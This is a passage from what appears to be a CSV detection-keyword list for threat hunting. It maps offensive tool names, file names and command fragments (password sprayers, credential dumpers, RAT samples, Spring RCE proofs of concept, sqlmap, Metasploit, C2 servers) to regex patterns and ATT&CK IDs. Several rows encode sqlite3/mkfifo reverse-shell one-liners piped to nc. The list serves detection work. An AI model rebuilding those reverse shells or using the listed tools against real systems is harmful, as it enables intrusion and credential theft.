less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","60038" "*spraykatz*",".{0,1000}spraykatz.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","1","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","60039" "*Spray-Passwords.ps1*",".{0,1000}Spray\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","60040" "*spring_framework_malicious_jar*",".{0,1000}spring_framework_malicious_jar.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","60041" "*Spring-cloud-function-SpEL-RCE*",".{0,1000}Spring\-cloud\-function\-SpEL\-RCE.{0,1000}","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","N/A","","N/A","","","","60042" "*spring-core-rce*ROOT.war*",".{0,1000}spring\-core\-rce.{0,1000}ROOT\.war.{0,1000}","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","N/A","1","50","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z","60043" "*springFramework_CVE-2022-22965_RCE.py*",".{0,1000}springFramework_CVE\-2022\-22965_RCE\.py.{0,1000}","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","N/A","1","75","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z","60044" "*SpyGate-RAT v*.exe*",".{0,1000}SpyGate\-RAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","60045" 
"*SpyGate-RAT.exe*",".{0,1000}SpyGate\-RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","60046" "*Spyndicapped spy *",".{0,1000}Spyndicapped\sspy\s.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","#content","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","60047" "*spyonweb-get-rootdomains *",".{0,1000}spyonweb\-get\-rootdomains\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","60048" "*spysecdump*",".{0,1000}spysecdump.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","60049" "*Spyware.KeeThief*",".{0,1000}Spyware\.KeeThief.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential 
Access","https://github.com/GhostPack/KeeThief","1","0","#Avsignature","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","60050" "*SQ17H1N6(*",".{0,1000}SQ17H1N6\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","60051" "*sql_persister.py*",".{0,1000}sql_persister\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","60052" "*SQLC2CMDS.dll*",".{0,1000}SQLC2CMDS\.dll.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","60053" "*SqlClrPayload*",".{0,1000}SqlClrPayload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60054" "*sqldumper.py*",".{0,1000}sqldumper\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","60055" "*sqli_common_shared.rb*",".{0,1000}sqli_common_shared\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60056" "*Sqli-lab*",".{0,1000}Sqli\-lab.{0,1000}","offensive_tool_keyword","sqli-labs","SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:","T1190 - T1553","TA0002 - TA0008","N/A","N/A","Vulnerability Scanner","https://github.com/Audi-1/sqli-labs","1","1","N/A","N/A","N/A","10","5436","1532","2023-12-11T17:06:16Z","2012-05-19T19:41:26Z","60057" "*SQL-Injection-Auth-Bypass-Payloads.*",".{0,1000}SQL\-Injection\-Auth\-Bypass\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","60058" "*SQL-Injection-Libraries*",".{0,1000}SQL\-Injection\-Libraries.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60059" "*SQL-Injection-Payloads.*",".{0,1000}SQL\-Injection\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","60060" "*SQLiPy.py*",".{0,1000}SQLiPy\.py.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/codewatchorg/sqlipy","1","1","N/A","network exploitation tool","N/A","3","254","92","2024-06-19T23:38:41Z","2014-09-22T03:25:42Z","60061" 
"*SQLiScanner*",".{0,1000}SQLiScanner.{0,1000}","offensive_tool_keyword","SQLiScanner","Automatic SQL injection with Charles and sqlmapapi","T1190 - T1556 - T1210 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Vulnerability Scanner","https://github.com/0xbug/SQLiScanner","1","1","N/A","N/A","N/A","9","801","282","2018-05-01T09:59:47Z","2016-08-28T06:06:32Z","60062" "*sqlite:///ares.db*",".{0,1000}sqlite\:\/\/\/ares\.db.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","60063" "*sqlite3 database/c2.db*",".{0,1000}sqlite3\sdatabase\/c2\.db.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","60064" "*sqlite3*/dev/null*'.shell*mkfifo*|""/bin/bash"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""\/bin\/bash\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60065" "*sqlite3*/dev/null*'.shell*mkfifo*|""/bin/sh"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""\/bin\/sh\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - 
T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60066" "*sqlite3*/dev/null*'.shell*mkfifo*|""bash"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""bash\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60067" "*sqlite3*/dev/null*'.shell*mkfifo*|""cmd"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""cmd\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60068" "*sqlite3*/dev/null*'.shell*mkfifo*|""powershell"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""powershell\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60069" "*sqlite3*/dev/null*'.shell*mkfifo*|""pwsh"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""pwsh\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60070" "*sqlite3*/dev/null*'.shell*mkfifo*|""zsh"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""zsh\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60071" "*sqlite3*/dev/null*'.shell*mkfifo*|sh -i*|nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|sh\s\-i.{0,1000}\|nc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60072" "*sqlmap -*",".{0,1000}sqlmap\s\-.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","60073" "*sqlmap --forms --batch -u *",".{0,1000}sqlmap\s\-\-forms\s\-\-batch\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60074" "*sqlmap.conf*",".{0,1000}sqlmap\.conf.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","60075" "*sqlmap.py*",".{0,1000}sqlmap\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","60076" "*sqlmap.rb*",".{0,1000}sqlmap\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60077" "*sqlmap/data/txt/wordlist.txt*",".{0,1000}sqlmap\/data\/txt\/wordlist\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","60078" "*sqlmap4burp*.jar*",".{0,1000}sqlmap4burp.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","60079" "*sqlmapapi -*",".{0,1000}sqlmapapi\s\-.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","60080" "*sqlmapapi.py",".{0,1000}sqlmapapi\.py","offensive_tool_keyword","sqlmap","Automatic SQL injection and database 
takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","60081" "*sqlmapapi.py*",".{0,1000}sqlmapapi\.py.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1059 - T1213 - T1203","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/codewatchorg/sqlipy","1","1","N/A","network exploitation tool","N/A","3","254","92","2024-06-19T23:38:41Z","2014-09-22T03:25:42Z","60082" "*sqlmapproject/sqlmap*",".{0,1000}sqlmapproject\/sqlmap.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","60083" "*sqlmapproject/sqlmap/issues/2442*",".{0,1000}sqlmapproject\/sqlmap\/issues\/2442.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","1","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","60084" "*SQLmate*",".{0,1000}SQLmate.{0,1000}","offensive_tool_keyword","SQLmate","A friend of SQLmap which will do what you always expected from SQLmap.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Vulnerability 
Scanner","https://github.com/s0md3v/sqlmate","1","1","N/A","N/A","N/A","5","440","119","2019-05-05T15:53:06Z","2017-10-19T19:55:58Z","60085" "*sqlninja*",".{0,1000}sqlninja.{0,1000}","offensive_tool_keyword","sqlninja","...a SQL Server injection & takeover tool","T1505 - T1526 - T1583 - T1588 - T1590","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","http://sqlninja.sourceforge.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","60086" "*SQLRecon.exe*",".{0,1000}SQLRecon\.exe.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","60087" "*SQLRecon.git*",".{0,1000}SQLRecon\.git.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","60088" "*SQLServer_Accessible_PotentialSensitiveData.txt*",".{0,1000}SQLServer_Accessible_PotentialSensitiveData\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","60089" "*SQLServer_DefaultLogin.txt*",".{0,1000}SQLServer_DefaultLogin\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows 
Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","60090" "*src/cracker.*",".{0,1000}src\/cracker\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60091" "*src/genmkvpwd.*",".{0,1000}src\/genmkvpwd\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60092" "*src/john.asm*",".{0,1000}src\/john\.asm.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60094" "*src/ligolo*",".{0,1000}src\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","60095" "*src/obfuscator.c*",".{0,1000}src\/obfuscator\.c.{0,1000}","offensive_tool_keyword","Striker","Striker is 